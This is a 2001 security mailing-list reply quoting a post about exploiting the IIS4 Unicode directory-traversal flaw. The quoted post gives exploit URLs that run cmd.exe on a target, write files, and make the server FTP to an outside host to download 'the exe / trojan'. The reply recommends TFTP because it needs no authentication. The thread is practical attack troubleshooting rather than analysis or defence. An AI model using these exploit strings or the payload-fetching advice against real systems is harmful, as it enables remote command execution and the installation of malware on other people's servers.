Re: unicode / iis4

[Dave Loschiavo <dloschiavo () FRCC CC CA US>]

You should try TFTP instead. With TFTP you can put the entire command on a
single line, and it doesn't require authentication.

----- Original Message -----
From: "Mad Zigy" <zigy () GLOBAL CO ZA>
To: <VULN-DEV () SECURITYFOCUS COM>
Sent: Saturday, January 06, 2001 7:59 AM
Subject: unicode / iis4


> Well i have been able to use msadc2.pl yet the
> commands i give do not work. so i tried the other way
> by doing
> http://hostname/scripts/..%c0%
> af../winnt/system32/cmd.exe?/c+echo+test+>+c:\test
> .txt
> and all it did was say: The parameter is incorrect.
> so then i though maybe we cant have a > in the string
> so i found the hex of it and tried
> http://hostname/scripts/..%c0%
> af../winnt/system32/cmd.exe?/c+echo+test+%
> 3e+c:\test.txt
> yet it still gave me the same: The parameter is
> incorrect.
> I have been able to make it ftp into my pc by
> http://hostname/scripts/..%c0%
> af../winnt/system32/cmd.exe?/c+ftp+hostname
> but i cant make it login as i need to echo a script
> which i can run http://hostname/scripts/..%c0%
> af../winnt/system32/cmd.exe?/c+ftp+-
> s:c:\ftp.txt+hostname so that it will login and
> download the exe / trojan
> Thankz zigy!